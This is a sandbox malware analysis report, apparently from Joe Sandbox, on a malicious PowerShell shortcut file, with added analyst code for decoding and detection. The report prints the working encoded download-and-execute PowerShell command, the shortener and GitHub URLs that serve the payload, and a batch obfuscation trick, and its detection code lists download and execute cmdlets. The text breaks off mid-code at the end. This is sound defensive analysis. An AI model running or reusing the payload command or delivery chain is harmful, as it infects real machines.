
Windows Analysis Report
Windows PowerShell.lnk

Overview

General Information

Sample name: Windows PowerShell.lnk
Analysis ID: 1526392
MD5: 02e1f1ea7dc301147433623d31e5a294
SHA1: b882f489808747b6201b113d306a42d533ca229e
SHA256: de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Performs an instant shutdown (NtRaiseHardError)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Compiles C# or VB.Net code
Connects to a URL shortener service
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA= MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5956 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5784 cmdline: cmd /c exit 97 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5672 cmdline: cmd /c exit 98 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 356 cmdline: cmd /c exit 99 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3816 cmdline: cmd /c exit 100 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1372 cmdline: cmd /c exit 101 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 796 cmdline: cmd /c exit 102 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5952 cmdline: cmd /c exit 103 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5716 cmdline: cmd /c exit 104 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5764 cmdline: cmd /c exit 105 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1008 cmdline: cmd /c exit 106 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 404 cmdline: cmd /c exit 107 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1668 cmdline: cmd /c exit 108 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4232 cmdline: cmd /c exit 109 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5812 cmdline: cmd /c exit 110 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 936 cmdline: cmd /c exit 111 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1364 cmdline: cmd /c exit 112 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4620 cmdline: cmd /c exit 113 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 616 cmdline: cmd /c exit 114 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1672 cmdline: cmd /c exit 115 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1016 cmdline: cmd /c exit 116 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2084 cmdline: cmd /c exit 117 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2324 cmdline: cmd /c exit 118 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3360 cmdline: cmd /c exit 119 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3004 cmdline: cmd /c exit 120 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5696 cmdline: cmd /c exit 121 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3820 cmdline: cmd /c exit 122 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3704 cmdline: cmd /c exit 65 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6568 cmdline: cmd /c exit 66 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7016 cmdline: cmd /c exit 67 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4328 cmdline: cmd /c exit 68 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3160 cmdline: cmd /c exit 69 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2308 cmdline: cmd /c exit 70 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 672 cmdline: cmd /c exit 71 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5988 cmdline: cmd /c exit 72 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4232 cmdline: cmd /c exit 73 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5812 cmdline: cmd /c exit 74 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 936 cmdline: cmd /c exit 75 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1364 cmdline: cmd /c exit 76 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4620 cmdline: cmd /c exit 77 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 616 cmdline: cmd /c exit 78 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1512 cmdline: cmd /c exit 79 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1136 cmdline: cmd /c exit 80 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1924 cmdline: cmd /c exit 81 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5700 cmdline: cmd /c exit 82 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3360 cmdline: cmd /c exit 83 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3816 cmdline: cmd /c exit 84 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1372 cmdline: cmd /c exit 85 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6288 cmdline: cmd /c exit 86 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5716 cmdline: cmd /c exit 87 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2548 cmdline: cmd /c exit 88 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4328 cmdline: cmd /c exit 89 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3160 cmdline: cmd /c exit 90 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2308 cmdline: cmd /c exit 48 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 672 cmdline: cmd /c exit 49 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6108 cmdline: cmd /c exit 50 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2924 cmdline: cmd /c exit 51 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3152 cmdline: cmd /c exit 52 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3748 cmdline: cmd /c exit 53 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4620 cmdline: cmd /c exit 54 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1016 cmdline: cmd /c exit 55 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2084 cmdline: cmd /c exit 56 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5676 cmdline: cmd /c exit 57 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5980 cmdline: cmd /c exit 123 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5672 cmdline: cmd /c exit 125 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3220 cmdline: cmd /c exit 63 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6068 cmdline: cmd /c exit 58 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1088 cmdline: cmd /c exit 46 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5716 cmdline: cmd /c exit 61 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2548 cmdline: cmd /c exit 44 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4328 cmdline: cmd /c exit 95 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3160 cmdline: cmd /c exit 45 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6196 cmdline: powershell -e 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 5608 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 4620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
No configs have been found
No yara matches
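The two encodings visible in the tree above can be undone offline. The Python below is an added analyst example, not part of the Joe Sandbox report and not code from the sample. It decodes the -e argument of the first powershell.exe (PID 3468), which is base64 over the UTF-16LE bytes of the script, the encoding -EncodedCommand expects, and it maps the exit codes of the cmd /c exit N children to characters. That second mapping rests on an inference, labelled as such in the code: cmd.exe's dynamic variable %=ExitCodeAscii% expands to the character whose code is the last exit code, a known batch-obfuscation trick for building strings without the characters appearing literally in the script. The report does not include the contents of the dropped .cmd, so this is consistent with the tree rather than confirmed by it.

```python
import base64
import re

# Copied from the first powershell.exe node in the process tree (PID 3468).
ENCODED_ARG = (
    "aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0A"
    "UAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA="
)

# Constructed: three tree lines in the format used above, to exercise the parser.
SAMPLE_TREE = """\
      • cmd.exe (PID: 5956 cmdline: cmd /c exit 97 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5672 cmdline: cmd /c exit 98 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3160 cmdline: cmd /c exit 45 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
"""

# Exit codes of the cmd /c exit N children, in the order the tree above lists them.
EXIT_CODE_CHILDREN = (
    list(range(97, 123))                        # a-z
    + list(range(65, 91))                       # A-Z
    + list(range(48, 58))                       # 0-9
    + [123, 125, 63, 58, 46, 61, 44, 95, 45]    # { } ? : . = , _ -
)


def decode_encoded_command(arg: str) -> str:
    """Decode a powershell.exe -e / -EncodedCommand argument.

    The argument is base64 over the UTF-16LE bytes of the script, not over
    ASCII, which is why a plain base64 decode shows every other byte as NUL.
    Logs often lose trailing '=' padding, so it is restored first.
    """
    padded = arg + "=" * (-len(arg) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def exit_codes_from_tree(tree_text: str) -> list:
    """Collect N from every 'cmd /c exit N' line, in order of appearance."""
    return [int(n) for n in re.findall(r"cmd /c exit (\d+)", tree_text)]


def exit_codes_to_text(codes) -> str:
    """Map exit codes to the characters %=ExitCodeAscii% would expand to.

    Assumption (not stated in the report): the dropped .cmd runs
    'cmd /c exit N' and then reads cmd.exe's dynamic variable
    %=ExitCodeAscii%, which expands to the character with code N for the
    printable range. A batch file can assemble strings this way without the
    characters ever appearing literally in it. Codes outside 32..126 are
    skipped because the variable is empty for them.
    """
    return "".join(chr(n) for n in codes if 32 <= n <= 126)


if __name__ == "__main__":
    print(decode_encoded_command(ENCODED_ARG))
    print(exit_codes_to_text(EXIT_CODE_CHILDREN))
    print(exit_codes_from_tree(SAMPLE_TREE))
```

The decoded first stage is a one-liner: Invoke-WebRequest (iwr) to the shortener, output to a file named only ".cmd" under %TMP%, then call that file. The exit codes, mapped through %=ExitCodeAscii%, give lower-case letters, upper-case letters, digits and a handful of punctuation characters, which is the shape of an alphabet table a batch obfuscator builds before indexing into it to form the second-stage powershell -e command line.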

System Summary

Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: powershell -e 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
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: powershell -e 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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -e 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
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -e 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
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3468, TargetFilename: C:\Users\user\AppData\Local\Temp\.cmd
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, ProcessId: 3468, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6196, TargetFilename: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=, ProcessId: 3468, ProcessName: powershell.exe
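What the Sigma matches above key on can be re-created as a small event-matching routine. The Python below is an added example; it is not part of the report and it is not the Sigma rules' own source. It implements simplified versions of three of the conditions (an encoded PowerShell command line whose decoded text contains a download or execute cmdlet, csc.exe launched from PowerShell with a response file under %TEMP%, and PowerShell creating a script file under %TEMP%), labels each hit with the matching rule title from the signature list, and runs them over event records constructed from the command lines and file paths shown in this report, using Sysmon field names. The ParentImage of the csc.exe record is inferred from the process tree, and the last record is a constructed benign control; everything else is copied from the lines above. It also shows the exclusion a practitioner needs: PowerShell itself writes a __PSScriptPolicyTest_*.ps1 probe into %TEMP% on every start (the file-created entry in the System Summary), which would otherwise fire the dropper check.

```python
import base64
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"
FIRST_STAGE_B64 = ("aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0A"
                   "UAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=")

# Sysmon-shaped records built from the report (EventID 1 = process create,
# EventID 11 = file create). Record 3's ParentImage is inferred from the
# process tree; record 4 is a constructed benign control, not from the report.
RECORDS = [
    {"EventID": 1, "Image": PS, "ParentImage": "",
     "CommandLine": f'"{PS}" -e {FIRST_STAGE_B64}'},
    {"EventID": 11, "Image": PS, "TargetFilename": TEMP + r"\.cmd"},
    {"EventID": 11, "Image": PS,
     "TargetFilename": TEMP + r"\__PSScriptPolicyTest_3pmmnvk1.1fc.ps1"},
    {"EventID": 1, "Image": CSC, "ParentImage": PS,
     "CommandLine": rf'"{CSC}" /noconfig /fullpaths @"{TEMP}\pbkjdvqy\pbkjdvqy.cmdline"'},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": rf"{PS} -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, down to -e.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|enco|encod|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{20,})",
    re.IGNORECASE)
DOWNLOAD_EXEC_MARKERS = ("iwr", "invoke-webrequest", "iex", "invoke-expression",
                         "downloadstring", "downloadfile", "start-bitstransfer")
DROPPER_EXTENSIONS = (".cmd", ".bat", ".ps1", ".vbs", ".js", ".hta", ".exe", ".dll")
USER_TEMP = "\\appdata\\local\\temp\\"


def decode_powershell_arg(b64: str) -> str:
    """Base64 of UTF-16LE, as used by -EncodedCommand; returns '' on garbage."""
    b64 = b64 + "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(b64).decode("utf-16-le", errors="replace")
    except ValueError:          # binascii.Error is a ValueError
        return ""


def check_encoded_powershell(rec):
    """Encoded command line whose decoded script downloads or evaluates code."""
    if rec.get("EventID") != 1 or not rec["Image"].lower().endswith("powershell.exe"):
        return None
    m = ENCODED_FLAG.search(rec["CommandLine"])
    if not m:
        return None
    decoded = decode_powershell_arg(m.group(1)).lower()
    if any(marker in decoded for marker in DOWNLOAD_EXEC_MARKERS):
        return "Suspicious Encoded PowerShell Command Line"
    return None


def check_csc_from_powershell(rec):
    """csc.exe started by PowerShell with a .cmdline response file under %TEMP%.

    Caveat: Add-Type produces exactly this pattern in legitimate scripts, so
    on its own it is a weak signal; it becomes strong when the parent command
    line is encoded (see check_encoded_powershell).
    """
    if rec.get("EventID") != 1 or not rec["Image"].lower().endswith("\\csc.exe"):
        return None
    cmd = rec["CommandLine"].lower()
    parent_is_ps = rec.get("ParentImage", "").lower().endswith("powershell.exe")
    if parent_is_ps and USER_TEMP in cmd and ".cmdline" in cmd:
        return "Dynamic .NET Compilation Via Csc.EXE"
    return None


def check_powershell_dropper(rec):
    """PowerShell writing a script or binary into the user's temp directory."""
    if rec.get("EventID") != 11 or not rec["Image"].lower().endswith("powershell.exe"):
        return None
    target = rec["TargetFilename"].lower()
    if "__psscriptpolicytest_" in target:
        return None   # PowerShell's own AppLocker/WDAC policy probe, written on every start
    if USER_TEMP in target and target.endswith(DROPPER_EXTENSIONS):
        return "Potential Binary Or Script Dropper Via PowerShell"
    return None


CHECKS = (check_encoded_powershell, check_csc_from_powershell, check_powershell_dropper)


def run_detections(records):
    """Return (record index, rule title) for every check that fires, in order."""
    hits = []
    for i, rec in enumerate(records):
        for check in CHECKS:
            title = check(rec)
            if title:
                hits.append((i, title))
    return hits


if __name__ == "__main__":
    for index, title in run_detections(RECORDS):
        print(index, title)
```

Run against the five records, the first stage, the dropped .cmd and the csc.exe launch each produce one hit, while the policy probe file and the plain -File invocation stay silent.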

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -e 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
No Suricata rule has matched


AV Detection

Source: Windows PowerShell.lnk | ReversingLabs: Detection: 13%
Source: Windows PowerShell.lnk | Virustotal: Detection: 19%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: Windows PowerShell.lnk | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: Binary string: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.pdb | source: powershell.exe, 0000004B.00000002.2248209888.000002145EE74000.00000004.00000800.00020000.00000000.sdmp
Source: unknown | DNS query: name: is.gd
Source: Joe Sandbox View | IP Address: 104.25.234.53
Source: Joe Sandbox View | IP Address: 140.82.121.4
Source: Joe Sandbox View | IP Address: 185.199.111.133
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /jwr7JD HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: is.gd | Cookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQ | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /user-attachments/files/17251016/powershell.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: objects.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jwr7JD HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: is.gd | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: is.gd
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: objects.githubusercontent.com
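The three requests above form one delivery chain: the shortener resolves to a GitHub user-attachments URL, which in turn hands the client a presigned S3 object URL on objects.githubusercontent.com. The Python below is an added example, not part of the report. It works on copies of those request lines (constructed below from the report, with the Cloudflare cookie and the X-Amz-Signature parameter left out) and records the two things worth capturing before the artefacts go stale: the User-Agent token that identifies Invoke-WebRequest in proxy logs, and the validity window of the presigned URL, which explains why the final URL cannot simply be fetched again later.

```python
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"

# Constructed from the "HTTP traffic detected" lines above: request line, Host, User-Agent.
# The Cloudflare cookie and the X-Amz-Signature value are omitted.
REQUESTS = [
    ("GET /jwr7JD HTTP/1.1", "is.gd", PS_UA),
    ("GET /user-attachments/files/17251016/powershell.zip HTTP/1.1", "github.com", PS_UA),
    ("GET /github-production-repository-file-5c1aeb/151309588/17251016"
     "?X-Amz-Algorithm=AWS4-HMAC-SHA256"
     "&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request"
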